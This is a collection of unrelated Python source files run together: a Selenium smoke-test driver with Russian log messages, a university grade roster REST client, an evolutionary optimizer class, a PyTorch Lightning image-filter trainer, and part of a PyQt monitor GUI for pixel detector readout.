read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) start_partial_cycle(main_data) check_end(main_data, last_mode, 'go_partial', 'частичный обход завершен') elif m == 'open_forms': log_record('начался обход открытия форм') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) open_forms(main_data) check_end(main_data, last_mode, 'open_forms', 'закончился обход открытия форм') if __name__ == "__main__": main_func()
retail-smoke/main.py
import logging from init_program import ( init_prog, start_browser, login_base ) from full_cycle import menu_full_cycle_go, page_full_cycle_go from serializer import write_serialize_data, read_serialize_data, delete_screens_and_log from toolbox import log_record, exit_prog from scenario_mod import start_scenario from cursor_pos import cursor_pos from partial_cycle import start_partial_cycle from go_open_form import open_forms from webdriver import get_webdriver_quit ''' главный модуль программы запуск программы происходит из этого модуля ''' def check_table_elements(main_data:object): table_elements = main_data.table_elements() if table_elements == None or len(table_elements['table']) == 0: get_webdriver_quit(main_data.driver()) log_record('программа прекратила работу, нет сохраненной таблицы меню, воспользуйтесь созданием данной таблицы через запуск программы в режиме savemenu') exit_prog() def check_end(main_data, last_mode:str, curr_mode:str, str_log:str): if last_mode == curr_mode: get_webdriver_quit(main_data.driver()) log_record(str_log) logging.shutdown() def main_func(): main_data = login_base( start_browser( init_prog(tuple()) ) ) mode = main_data.mode() last_mode = mode[-1] if main_data.del_screen_and_log() == 'Yes': delete_screens_and_log() log_record('НАЧАЛО РАБОТЫ ПРОГРАММЫ') for m in mode: if m == 'savemenu': log_record('началось чтение разделов меню программы') old_table = read_serialize_data('dict_main_elements') del old_table main_data = menu_full_cycle_go(main_data) write_serialize_data('dict_main_elements', main_data.table_elements()) check_end(main_data, last_mode, 'savemenu', 'разделы сохранены в файл dict_main_elements.pickle') elif m == 'go': log_record('начался обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) page_full_cycle_go(main_data) check_end(main_data, last_mode, 'go', 'обход завершен') elif m == 'scenario': start_scenario(main_data) check_end(main_data, last_mode, 'scenario', 'закончено выполнение сценария') elif m == 'cursor': cursor_pos(main_data) elif m == 'go_partial': log_record('начался частичный обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) start_partial_cycle(main_data) check_end(main_data, last_mode, 'go_partial', 'частичный обход завершен') elif m == 'open_forms': log_record('начался обход открытия форм') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) open_forms(main_data) check_end(main_data, last_mode, 'open_forms', 'закончился обход открытия форм') if __name__ == "__main__": main_func()
0.110916
0.120051
from restclients.pws import PWS from restclients.sws import encode_section_label from restclients.dao import SWS_DAO from restclients.exceptions import DataFailureException from restclients.models.sws import GradeRoster, GradeRosterItem from restclients.models.sws import GradeSubmissionDelegate from lxml import etree import re graderoster_url = "/student/v5/graderoster" def get_graderoster(section, instructor, requestor): """ Returns a restclients.GradeRoster for the passed Section model and instructor Person. """ label = GradeRoster(section=section, instructor=instructor).graderoster_label() url = "%s/%s" % (graderoster_url, encode_section_label(label)) headers = {"Accept": "text/xhtml", "Connection": "keep-alive", "X-UW-Act-as": requestor.uwnetid} response = SWS_DAO().getURL(url, headers) if response.status != 200: root = etree.fromstring(response.data) msg = root.find(".//*[@class='status_description']").text.strip() raise DataFailureException(url, response.status, msg) return graderoster_from_xhtml(response.data, section, instructor) def update_graderoster(graderoster, requestor): """ Updates the graderoster resource for the passed restclients.GradeRoster model. A new restclients.GradeRoster is returned, representing the document returned from the update request. """ label = graderoster.graderoster_label() url = "%s/%s" % (graderoster_url, encode_section_label(label)) headers = {"Content-Type": "application/xhtml+xml", "Connection": "keep-alive", "X-UW-Act-as": requestor.uwnetid} body = graderoster.xhtml() response = SWS_DAO().putURL(url, headers, body) if response.status != 200: root = etree.fromstring(response.data) msg = root.find(".//*[@class='status_description']").text.strip() raise DataFailureException(url, response.status, msg) return graderoster_from_xhtml(response.data, graderoster.section, graderoster.instructor) def graderoster_from_xhtml(data, section, instructor): pws = PWS() people = {instructor.uwregid: instructor} graderoster = GradeRoster() graderoster.section = section graderoster.instructor = instructor graderoster.authorized_grade_submitters = [] graderoster.grade_submission_delegates = [] graderoster.items = [] tree = etree.fromstring(data.strip()) nsmap = {"xhtml": "http://www.w3.org/1999/xhtml"} root = tree.xpath(".//xhtml:div[@class='graderoster']", namespaces=nsmap)[0] default_section_id = None el = root.xpath("./xhtml:div/xhtml:a[@rel='section']/*[@class='section_id']", namespaces=nsmap)[0] default_section_id = el.text.upper() el = root.xpath("./xhtml:div/*[@class='section_credits']", namespaces=nsmap)[0] if el.text is not None: graderoster.section_credits = el.text.strip() el = root.xpath("./xhtml:div/*[@class='writing_credit_display']", namespaces=nsmap)[0] if el.get("checked", "") == "checked": graderoster.allows_writing_credit = True for el in root.xpath("./xhtml:div//*[@rel='authorized_grade_submitter']", namespaces=nsmap): reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) graderoster.authorized_grade_submitters.append(people[reg_id]) for el in root.xpath("./xhtml:div//*[@class='grade_submission_delegate']", namespaces=nsmap): reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip() delegate_level = el.xpath(".//*[@class='delegate_level']")[0].text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) delegate = GradeSubmissionDelegate(person=people[reg_id], delegate_level=delegate_level) graderoster.grade_submission_delegates.append(delegate) for item in root.xpath("./*[@class='graderoster_items']/*[@class='graderoster_item']"): gr_item = GradeRosterItem(section_id=default_section_id) gr_item.grade_choices = [] for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='reg_id']", namespaces=nsmap): gr_item.student_uwregid = el.text.strip() for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='name']", namespaces=nsmap): full_name = el.text.strip() try: (surname, first_name) = full_name.split(",", 1) gr_item.student_first_name = first_name gr_item.student_surname = surname except ValueError: pass for el in item.xpath(".//*[@class]"): classname = el.get("class") if classname == "duplicate_code" and el.text is not None: duplicate_code = el.text.strip() if len(duplicate_code): gr_item.duplicate_code = duplicate_code elif classname == "section_id" and el.text is not None: gr_item.section_id = el.text.strip() elif classname == "student_former_name" and el.text is not None: student_former_name = el.text.strip() if len(student_former_name): gr_item.student_former_name = student_former_name elif classname == "student_number": gr_item.student_number = el.text.strip() elif classname == "student_credits" and el.text is not None: gr_item.student_credits = el.text.strip() elif "date_withdrawn" in classname and el.text is not None: gr_item.date_withdrawn = el.text.strip() elif classname == "incomplete": if el.get("checked", "") == "checked": gr_item.has_incomplete = True if el.get("disabled", "") != "disabled": gr_item.allows_incomplete = True elif classname == "writing_course": if el.get("checked", "") == "checked": gr_item.has_writing_credit = True elif classname == "auditor": if el.get("checked", "") == "checked": gr_item.is_auditor = True elif classname == "no_grade_now": if el.get("checked", "") == "checked": gr_item.no_grade_now = True elif classname == "grades": if el.get("disabled", "") != "disabled": gr_item.allows_grade_change = True elif classname == "grade": grade = el.text.strip() if el.text is not None else "" gr_item.grade_choices.append(grade) if el.get("selected", "") == "selected": gr_item.grade = grade elif classname == "grade_document_id" and el.text is not None: gr_item.grade_document_id = el.text.strip() elif "date_graded" in classname and el.text is not None: gr_item.date_graded = el.text.strip() elif classname == "grade_submitter_source" and el.text is not None: gr_item.grade_submitter_source = el.text.strip() elif classname == "code" and el.text is not None: gr_item.status_code = el.text.strip() elif classname == "message" and el.text is not None: gr_item.status_message = el.text.strip() for el in item.xpath(".//xhtml:a[@rel='grade_submitter_person']/*[@class='reg_id']", namespaces=nsmap): reg_id = el.text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) gr_item.grade_submitter_person = people[reg_id] graderoster.items.append(gr_item) return graderoster
restclients/sws/v5/graderoster.py
from restclients.pws import PWS from restclients.sws import encode_section_label from restclients.dao import SWS_DAO from restclients.exceptions import DataFailureException from restclients.models.sws import GradeRoster, GradeRosterItem from restclients.models.sws import GradeSubmissionDelegate from lxml import etree import re graderoster_url = "/student/v5/graderoster" def get_graderoster(section, instructor, requestor): """ Returns a restclients.GradeRoster for the passed Section model and instructor Person. """ label = GradeRoster(section=section, instructor=instructor).graderoster_label() url = "%s/%s" % (graderoster_url, encode_section_label(label)) headers = {"Accept": "text/xhtml", "Connection": "keep-alive", "X-UW-Act-as": requestor.uwnetid} response = SWS_DAO().getURL(url, headers) if response.status != 200: root = etree.fromstring(response.data) msg = root.find(".//*[@class='status_description']").text.strip() raise DataFailureException(url, response.status, msg) return graderoster_from_xhtml(response.data, section, instructor) def update_graderoster(graderoster, requestor): """ Updates the graderoster resource for the passed restclients.GradeRoster model. A new restclients.GradeRoster is returned, representing the document returned from the update request. """ label = graderoster.graderoster_label() url = "%s/%s" % (graderoster_url, encode_section_label(label)) headers = {"Content-Type": "application/xhtml+xml", "Connection": "keep-alive", "X-UW-Act-as": requestor.uwnetid} body = graderoster.xhtml() response = SWS_DAO().putURL(url, headers, body) if response.status != 200: root = etree.fromstring(response.data) msg = root.find(".//*[@class='status_description']").text.strip() raise DataFailureException(url, response.status, msg) return graderoster_from_xhtml(response.data, graderoster.section, graderoster.instructor) def graderoster_from_xhtml(data, section, instructor): pws = PWS() people = {instructor.uwregid: instructor} graderoster = GradeRoster() graderoster.section = section graderoster.instructor = instructor graderoster.authorized_grade_submitters = [] graderoster.grade_submission_delegates = [] graderoster.items = [] tree = etree.fromstring(data.strip()) nsmap = {"xhtml": "http://www.w3.org/1999/xhtml"} root = tree.xpath(".//xhtml:div[@class='graderoster']", namespaces=nsmap)[0] default_section_id = None el = root.xpath("./xhtml:div/xhtml:a[@rel='section']/*[@class='section_id']", namespaces=nsmap)[0] default_section_id = el.text.upper() el = root.xpath("./xhtml:div/*[@class='section_credits']", namespaces=nsmap)[0] if el.text is not None: graderoster.section_credits = el.text.strip() el = root.xpath("./xhtml:div/*[@class='writing_credit_display']", namespaces=nsmap)[0] if el.get("checked", "") == "checked": graderoster.allows_writing_credit = True for el in root.xpath("./xhtml:div//*[@rel='authorized_grade_submitter']", namespaces=nsmap): reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) graderoster.authorized_grade_submitters.append(people[reg_id]) for el in root.xpath("./xhtml:div//*[@class='grade_submission_delegate']", namespaces=nsmap): reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip() delegate_level = el.xpath(".//*[@class='delegate_level']")[0].text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) delegate = GradeSubmissionDelegate(person=people[reg_id], delegate_level=delegate_level) graderoster.grade_submission_delegates.append(delegate) for item in root.xpath("./*[@class='graderoster_items']/*[@class='graderoster_item']"): gr_item = GradeRosterItem(section_id=default_section_id) gr_item.grade_choices = [] for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='reg_id']", namespaces=nsmap): gr_item.student_uwregid = el.text.strip() for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='name']", namespaces=nsmap): full_name = el.text.strip() try: (surname, first_name) = full_name.split(",", 1) gr_item.student_first_name = first_name gr_item.student_surname = surname except ValueError: pass for el in item.xpath(".//*[@class]"): classname = el.get("class") if classname == "duplicate_code" and el.text is not None: duplicate_code = el.text.strip() if len(duplicate_code): gr_item.duplicate_code = duplicate_code elif classname == "section_id" and el.text is not None: gr_item.section_id = el.text.strip() elif classname == "student_former_name" and el.text is not None: student_former_name = el.text.strip() if len(student_former_name): gr_item.student_former_name = student_former_name elif classname == "student_number": gr_item.student_number = el.text.strip() elif classname == "student_credits" and el.text is not None: gr_item.student_credits = el.text.strip() elif "date_withdrawn" in classname and el.text is not None: gr_item.date_withdrawn = el.text.strip() elif classname == "incomplete": if el.get("checked", "") == "checked": gr_item.has_incomplete = True if el.get("disabled", "") != "disabled": gr_item.allows_incomplete = True elif classname == "writing_course": if el.get("checked", "") == "checked": gr_item.has_writing_credit = True elif classname == "auditor": if el.get("checked", "") == "checked": gr_item.is_auditor = True elif classname == "no_grade_now": if el.get("checked", "") == "checked": gr_item.no_grade_now = True elif classname == "grades": if el.get("disabled", "") != "disabled": gr_item.allows_grade_change = True elif classname == "grade": grade = el.text.strip() if el.text is not None else "" gr_item.grade_choices.append(grade) if el.get("selected", "") == "selected": gr_item.grade = grade elif classname == "grade_document_id" and el.text is not None: gr_item.grade_document_id = el.text.strip() elif "date_graded" in classname and el.text is not None: gr_item.date_graded = el.text.strip() elif classname == "grade_submitter_source" and el.text is not None: gr_item.grade_submitter_source = el.text.strip() elif classname == "code" and el.text is not None: gr_item.status_code = el.text.strip() elif classname == "message" and el.text is not None: gr_item.status_message = el.text.strip() for el in item.xpath(".//xhtml:a[@rel='grade_submitter_person']/*[@class='reg_id']", namespaces=nsmap): reg_id = el.text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) gr_item.grade_submitter_person = people[reg_id] graderoster.items.append(gr_item) return graderoster
0.449151
0.158012
import logging import numpy as np from .evolutionary_optimizer import EvolutionaryOptimizer from ..util.argument_validation import argument_validation LOGGER = logging.getLogger(__name__) class Island(EvolutionaryOptimizer): """ Island: a basic unit of evolutionary optimization. It performs the generation and evolution of a single population using a generator and evolutionary algorithm, respectively. Parameters ---------- evolution_algorithm : `EvolutionaryAlgorithm` The desired algorithm to use in assessing the population generator : `Generator` The generator class that returns an instance of a chromosome population_size : int The desired size of the population hall_of_fame : `HallOfFame` (optional) The hall of fame object to be used for storing best individuals Attributes ---------- generational_age : int The number of generational steps that have been executed population : list of chromosomes The population that is evolving hall_of_fame: `HallOfFame` An object containing the best individuals seen in the optimization test_function: `FitnessFunction` (optional) A function which can judges the fitness of an individual, independent of the `FitnessFunction` used in evolution """ @argument_validation(population_size={">=": 0}) def __init__(self, evolution_algorithm, generator, population_size, hall_of_fame=None, test_function=None): super().__init__(hall_of_fame, test_function) self._generator = generator self.population = [generator() for _ in range(population_size)] self._ea = evolution_algorithm self._population_size = population_size self.idx = 0 def _do_evolution(self, num_generations): for _ in range(num_generations): self._execute_generational_step() def _execute_generational_step(self): self.generational_age += 1 self.population = self._ea.generational_step(self.population, self.idx) for indv in self.population: indv.genetic_age += 1 def evaluate_population(self): """Manually trigger evaluation of population""" self._ea.evaluation(self.population) def get_best_individual(self): """Finds the individual with the lowest fitness in a population Returns ------- best : chromosomes The chromosomes with the lowest fitness value """ self.evaluate_population() best = self.population[0] for indv in self.population: if indv.fitness < best.fitness or np.isnan(best.fitness).any(): best = indv return best def get_best_fitness(self): """ finds the fitness value of the most fit individual Returns ------- : Fitness of best individual """ return self.get_best_individual().fitness def get_fitness_evaluation_count(self): """ Gets the number of fitness evaluations performed Returns ------- int : number of fitness evaluations """ return self._ea.evaluation.eval_count def get_ea_diagnostic_info(self): """ Gets diagnostic info from the evolutionary algorithm(s) Returns ------- EaDiagnosticsSummary : summary of evolutionary algorithm diagnostics """ return self._ea.diagnostics def _get_potential_hof_members(self): return self.population def dump_fraction_of_population(self, fraction): """Dumps a portion of the population to a list Parameters ---------- fraction : float [0.0 - 1.0] The fraction of the population to dump Returns ------- list of chromosomes : A portion of the population """ np.random.shuffle(self.population) index = int(round(fraction * len(self.population))) dumped_population = self.population[:index] self.population = self.population[index:] return dumped_population def regenerate_population(self): """Randomly regenerates the population""" self.population = [self._generator() for _ in range(len(self.population))] def reset_fitness(self, population=None): """ Mark each individual in the population as needing fitness evaluation Parameters ---------- population: list of `Chromosome` (Optional) Population to be reset. Default: the island's current population """ if population is None: population = self.population for indv in population: indv.fit_set = False
bingo/evolutionary_optimizers/island.py
import logging import numpy as np from .evolutionary_optimizer import EvolutionaryOptimizer from ..util.argument_validation import argument_validation LOGGER = logging.getLogger(__name__) class Island(EvolutionaryOptimizer): """ Island: a basic unit of evolutionary optimization. It performs the generation and evolution of a single population using a generator and evolutionary algorithm, respectively. Parameters ---------- evolution_algorithm : `EvolutionaryAlgorithm` The desired algorithm to use in assessing the population generator : `Generator` The generator class that returns an instance of a chromosome population_size : int The desired size of the population hall_of_fame : `HallOfFame` (optional) The hall of fame object to be used for storing best individuals Attributes ---------- generational_age : int The number of generational steps that have been executed population : list of chromosomes The population that is evolving hall_of_fame: `HallOfFame` An object containing the best individuals seen in the optimization test_function: `FitnessFunction` (optional) A function which can judges the fitness of an individual, independent of the `FitnessFunction` used in evolution """ @argument_validation(population_size={">=": 0}) def __init__(self, evolution_algorithm, generator, population_size, hall_of_fame=None, test_function=None): super().__init__(hall_of_fame, test_function) self._generator = generator self.population = [generator() for _ in range(population_size)] self._ea = evolution_algorithm self._population_size = population_size self.idx = 0 def _do_evolution(self, num_generations): for _ in range(num_generations): self._execute_generational_step() def _execute_generational_step(self): self.generational_age += 1 self.population = self._ea.generational_step(self.population, self.idx) for indv in self.population: indv.genetic_age += 1 def evaluate_population(self): """Manually trigger evaluation of population""" self._ea.evaluation(self.population) def get_best_individual(self): """Finds the individual with the lowest fitness in a population Returns ------- best : chromosomes The chromosomes with the lowest fitness value """ self.evaluate_population() best = self.population[0] for indv in self.population: if indv.fitness < best.fitness or np.isnan(best.fitness).any(): best = indv return best def get_best_fitness(self): """ finds the fitness value of the most fit individual Returns ------- : Fitness of best individual """ return self.get_best_individual().fitness def get_fitness_evaluation_count(self): """ Gets the number of fitness evaluations performed Returns ------- int : number of fitness evaluations """ return self._ea.evaluation.eval_count def get_ea_diagnostic_info(self): """ Gets diagnostic info from the evolutionary algorithm(s) Returns ------- EaDiagnosticsSummary : summary of evolutionary algorithm diagnostics """ return self._ea.diagnostics def _get_potential_hof_members(self): return self.population def dump_fraction_of_population(self, fraction): """Dumps a portion of the population to a list Parameters ---------- fraction : float [0.0 - 1.0] The fraction of the population to dump Returns ------- list of chromosomes : A portion of the population """ np.random.shuffle(self.population) index = int(round(fraction * len(self.population))) dumped_population = self.population[:index] self.population = self.population[index:] return dumped_population def regenerate_population(self): """Randomly regenerates the population""" self.population = [self._generator() for _ in range(len(self.population))] def reset_fitness(self, population=None): """ Mark each individual in the population as needing fitness evaluation Parameters ---------- population: list of `Chromosome` (Optional) Population to be reset. Default: the island's current population """ if population is None: population = self.population for indv in population: indv.fit_set = False
0.923631
0.798933
from pathlib import Path import cv2 import numpy as np import pytorch_lightning as pl import torch import torchvision from pytorch_lightning.callbacks import ModelCheckpoint from torch.nn import functional as F from torch.utils.data import DataLoader from core.dataloaders.mit_dataloader import MitData from core.network.custom_nets import FIP class LitModel(pl.LightningModule): """Docstring for LitModel. """ def __init__(self, data_dir: str, batch_size: int, num_workers: int = 6, lr: float = 1e-4, **kwargs) -> None: """ @lr: learning rate """ super().__init__() self.model = FIP() self.save_hyperparameters() def forward(self, x): """forward function for litmodel """ return self.model(x) def configure_optimizers(self): # eps same as tensorflow adam return torch.optim.Adam(self.parameters(), lr=self.hparams.lr, eps=1e-7) def setup(self, stage=None): train_dir = Path(self.hparams.data_dir).joinpath('train') val_dir = Path(self.hparams.data_dir).joinpath('val') train_dir_1 = train_dir.joinpath('set-1') self.mit_train_1 = MitData(train_dir_1, is_train=True) train_dir_2 = train_dir.joinpath('set-2') self.mit_train_2 = MitData(train_dir_2, is_train=True) self.mit_val = MitData(val_dir, is_train=False) def train_dataloader(self): if self.current_epoch < 120: train_dl = DataLoader(self.mit_train_1, batch_size=self.hparams.batch_size, shuffle=True, num_workers=self.hparams.num_workers) else: train_dl = DataLoader(self.mit_train_2, batch_size=self.hparams.batch_size, shuffle=True, num_workers=self.hparams.num_workers) return train_dl def val_dataloader(self): val_dl = DataLoader(self.mit_val, batch_size=self.hparams.batch_size, shuffle=False, num_workers=self.hparams.num_workers) return val_dl def _vis_images(self, y, idx, prefix='val'): y_hat_dbg = y.detach().clone() y_hat_dbg = y_hat_dbg[0:10] dbg_imgs = y_hat_dbg.cpu().numpy() for i in range(dbg_imgs.shape[0]): img = dbg_imgs[i] img = np.transpose(img, [1, 2, 0]) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) if idx == 1: img = np.clip(img, 0, 1) else: img = cv2.normalize(img, None, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F) dbg_imgs[i] = np.transpose(img, [2, 0, 1]) dbg_imgs = torch.tensor(dbg_imgs) grid = torchvision.utils.make_grid(dbg_imgs) if idx == 0: self.logger.experiment.add_image(f'{prefix}_gt', grid, self.global_step) elif idx == 1: self.logger.experiment.add_image(f'{prefix}_preds', grid, self.global_step) else: self.logger.experiment.add_image(f'{prefix}_input', grid, self.global_step) def validation_step(self, batch, batch_idx): x, y = batch y_hat = self(x) loss = F.mse_loss(y_hat, y, reduction='sum') if batch_idx % 250 == 0: self._vis_images(y, 0, prefix='val') self._vis_images(y_hat, 1, prefix='val') self._vis_images(x, 2, prefix='val') tf_logs = {'val_loss': loss} return {'loss': loss, 'log': tf_logs} def training_step(self, batch, batch_idx): x, y = batch y_hat = self(x) loss = F.mse_loss(y_hat, y, reduction='sum') if batch_idx % 250 == 0: self._vis_images(y, 0, prefix='train') self._vis_images(y_hat, 1, prefix='train') self._vis_images(x, 2, prefix='train') tf_logs = {'train_loss': loss} return {'loss': loss, 'log': tf_logs} def validation_epoch_end(self, outputs): avg_loss = torch.stack([x['loss'] for x in outputs]).mean() return {'val_loss': avg_loss} if __name__ == "__main__": data_dir = '/media/nthere/datasets/FastImageProcessing/data/style/' model = LitModel(data_dir=data_dir, batch_size=1) ckpt_cb = ModelCheckpoint(filepath='./style-2/', save_top_k=10, save_weights_only=False) trainer = pl.Trainer(gpus=[0], max_epochs=180, checkpoint_callback=ckpt_cb, # resume_from_checkpoint='./style/_ckpt_epoch_48.ckpt', reload_dataloaders_every_epoch=True) trainer.fit(model)
src/core/trainers/filter_trainer.py
from pathlib import Path import cv2 import numpy as np import pytorch_lightning as pl import torch import torchvision from pytorch_lightning.callbacks import ModelCheckpoint from torch.nn import functional as F from torch.utils.data import DataLoader from core.dataloaders.mit_dataloader import MitData from core.network.custom_nets import FIP class LitModel(pl.LightningModule): """Docstring for LitModel. """ def __init__(self, data_dir: str, batch_size: int, num_workers: int = 6, lr: float = 1e-4, **kwargs) -> None: """ @lr: learning rate """ super().__init__() self.model = FIP() self.save_hyperparameters() def forward(self, x): """forward function for litmodel """ return self.model(x) def configure_optimizers(self): # eps same as tensorflow adam return torch.optim.Adam(self.parameters(), lr=self.hparams.lr, eps=1e-7) def setup(self, stage=None): train_dir = Path(self.hparams.data_dir).joinpath('train') val_dir = Path(self.hparams.data_dir).joinpath('val') train_dir_1 = train_dir.joinpath('set-1') self.mit_train_1 = MitData(train_dir_1, is_train=True) train_dir_2 = train_dir.joinpath('set-2') self.mit_train_2 = MitData(train_dir_2, is_train=True) self.mit_val = MitData(val_dir, is_train=False) def train_dataloader(self): if self.current_epoch < 120: train_dl = DataLoader(self.mit_train_1, batch_size=self.hparams.batch_size, shuffle=True, num_workers=self.hparams.num_workers) else: train_dl = DataLoader(self.mit_train_2, batch_size=self.hparams.batch_size, shuffle=True, num_workers=self.hparams.num_workers) return train_dl def val_dataloader(self): val_dl = DataLoader(self.mit_val, batch_size=self.hparams.batch_size, shuffle=False, num_workers=self.hparams.num_workers) return val_dl def _vis_images(self, y, idx, prefix='val'): y_hat_dbg = y.detach().clone() y_hat_dbg = y_hat_dbg[0:10] dbg_imgs = y_hat_dbg.cpu().numpy() for i in range(dbg_imgs.shape[0]): img = dbg_imgs[i] img = np.transpose(img, [1, 2, 0]) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) if idx == 1: img = np.clip(img, 0, 1) else: img = cv2.normalize(img, None, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F) dbg_imgs[i] = np.transpose(img, [2, 0, 1]) dbg_imgs = torch.tensor(dbg_imgs) grid = torchvision.utils.make_grid(dbg_imgs) if idx == 0: self.logger.experiment.add_image(f'{prefix}_gt', grid, self.global_step) elif idx == 1: self.logger.experiment.add_image(f'{prefix}_preds', grid, self.global_step) else: self.logger.experiment.add_image(f'{prefix}_input', grid, self.global_step) def validation_step(self, batch, batch_idx): x, y = batch y_hat = self(x) loss = F.mse_loss(y_hat, y, reduction='sum') if batch_idx % 250 == 0: self._vis_images(y, 0, prefix='val') self._vis_images(y_hat, 1, prefix='val') self._vis_images(x, 2, prefix='val') tf_logs = {'val_loss': loss} return {'loss': loss, 'log': tf_logs} def training_step(self, batch, batch_idx): x, y = batch y_hat = self(x) loss = F.mse_loss(y_hat, y, reduction='sum') if batch_idx % 250 == 0: self._vis_images(y, 0, prefix='train') self._vis_images(y_hat, 1, prefix='train') self._vis_images(x, 2, prefix='train') tf_logs = {'train_loss': loss} return {'loss': loss, 'log': tf_logs} def validation_epoch_end(self, outputs): avg_loss = torch.stack([x['loss'] for x in outputs]).mean() return {'val_loss': avg_loss} if __name__ == "__main__": data_dir = '/media/nthere/datasets/FastImageProcessing/data/style/' model = LitModel(data_dir=data_dir, batch_size=1) ckpt_cb = ModelCheckpoint(filepath='./style-2/', save_top_k=10, save_weights_only=False) trainer = pl.Trainer(gpus=[0], max_epochs=180, checkpoint_callback=ckpt_cb, # resume_from_checkpoint='./style/_ckpt_epoch_48.ckpt', reload_dataloaders_every_epoch=True) trainer.fit(model)
0.882028
0.385086
from online_monitor.receiver.receiver import Receiver from zmq.utils import jsonapi import numpy as np import time from PyQt4 import Qt import pyqtgraph as pg from pyqtgraph.Qt import QtCore, QtGui import pyqtgraph.ptime as ptime from pyqtgraph.dockarea import DockArea, Dock from online_monitor.utils import utils class PybarFEI4(Receiver): def setup_receiver(self): self.set_bidirectional_communication() # We want to change converter settings def setup_widgets(self, parent, name): dock_area = DockArea() parent.addTab(dock_area, name) # Docks dock_occcupancy = Dock("Occupancy", size=(400, 400)) dock_run_config = Dock("Run configuration", size=(400, 400)) dock_global_config = Dock("Global configuration", size=(400, 400)) dock_tot = Dock("Time over threshold values (TOT)", size=(400, 400)) dock_tdc = Dock("Time digital converter values (TDC)", size=(400, 400)) dock_event_status = Dock("Event status", size=(400, 400)) dock_trigger_status = Dock("Trigger status", size=(400, 400)) dock_service_records = Dock("Service records", size=(400, 400)) dock_hit_timing = Dock("Hit timing (rel. BCID)", size=(400, 400)) dock_status = Dock("Status", size=(800, 40)) dock_area.addDock(dock_global_config, 'left') dock_area.addDock(dock_run_config, 'above', dock_global_config) dock_area.addDock(dock_occcupancy, 'above', dock_run_config) dock_area.addDock(dock_tdc, 'right', dock_occcupancy) dock_area.addDock(dock_tot, 'above', dock_tdc) dock_area.addDock(dock_service_records, 'bottom', dock_occcupancy) dock_area.addDock(dock_trigger_status, 'above', dock_service_records) dock_area.addDock(dock_event_status, 'above', dock_trigger_status) dock_area.addDock(dock_hit_timing, 'bottom', dock_tot) dock_area.addDock(dock_status, 'top') # Status dock on top cw = QtGui.QWidget() cw.setStyleSheet("QWidget {background-color:white}") layout = QtGui.QGridLayout() cw.setLayout(layout) self.rate_label = QtGui.QLabel("Readout Rate\n0 Hz") self.hit_rate_label = QtGui.QLabel("Hit Rate\n0 Hz") self.event_rate_label = QtGui.QLabel("Event Rate\n0 Hz") self.timestamp_label = QtGui.QLabel("Data Timestamp\n") self.plot_delay_label = QtGui.QLabel("Plot Delay\n") self.scan_parameter_label = QtGui.QLabel("Scan Parameters\n") self.spin_box = Qt.QSpinBox(value=0) self.spin_box.setMaximum(1000000) self.spin_box.setSuffix(" Readouts") self.reset_button = QtGui.QPushButton('Reset') layout.addWidget(self.timestamp_label, 0, 0, 0, 1) layout.addWidget(self.plot_delay_label, 0, 1, 0, 1) layout.addWidget(self.rate_label, 0, 2, 0, 1) layout.addWidget(self.hit_rate_label, 0, 3, 0, 1) layout.addWidget(self.event_rate_label, 0, 4, 0, 1) layout.addWidget(self.scan_parameter_label, 0, 5, 0, 1) layout.addWidget(self.spin_box, 0, 6, 0, 1) layout.addWidget(self.reset_button, 0, 7, 0, 1) dock_status.addWidget(cw) # Connect widgets self.reset_button.clicked.connect(lambda: self.send_command('RESET')) self.spin_box.valueChanged.connect(lambda value: self.send_command(str(value))) # Run config dock self.run_conf_list_widget = Qt.QListWidget() dock_run_config.addWidget(self.run_conf_list_widget) # Global config dock self.global_conf_list_widget = Qt.QListWidget() dock_global_config.addWidget(self.global_conf_list_widget) # Different plot docks occupancy_graphics = pg.GraphicsLayoutWidget() occupancy_graphics.show() view = occupancy_graphics.addViewBox() self.occupancy_img = pg.ImageItem(border='w') view.addItem(self.occupancy_img) view.setRange(QtCore.QRectF(0, 0, 80, 336)) dock_occcupancy.addWidget(occupancy_graphics) tot_plot_widget = pg.PlotWidget(background="w") self.tot_plot = tot_plot_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) tot_plot_widget.showGrid(y=True) dock_tot.addWidget(tot_plot_widget) tdc_plot_widget = pg.PlotWidget(background="w") self.tdc_plot = tdc_plot_widget.plot(np.linspace(-0.5, 4095.5, 4097), np.zeros((4096)), stepMode=True) tdc_plot_widget.showGrid(y=True) tdc_plot_widget.setXRange(0, 800, update=True) dock_tdc.addWidget(tdc_plot_widget) event_status_widget = pg.PlotWidget() self.event_status_plot = event_status_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) event_status_widget.showGrid(y=True) dock_event_status.addWidget(event_status_widget) trigger_status_widget = pg.PlotWidget() self.trigger_status_plot = trigger_status_widget.plot(np.linspace(-0.5, 7.5, 9), np.zeros((8)), stepMode=True) trigger_status_widget.showGrid(y=True) dock_trigger_status.addWidget(trigger_status_widget) service_record_widget = pg.PlotWidget() self.service_record_plot = service_record_widget.plot(np.linspace(-0.5, 31.5, 33), np.zeros((32)), stepMode=True) 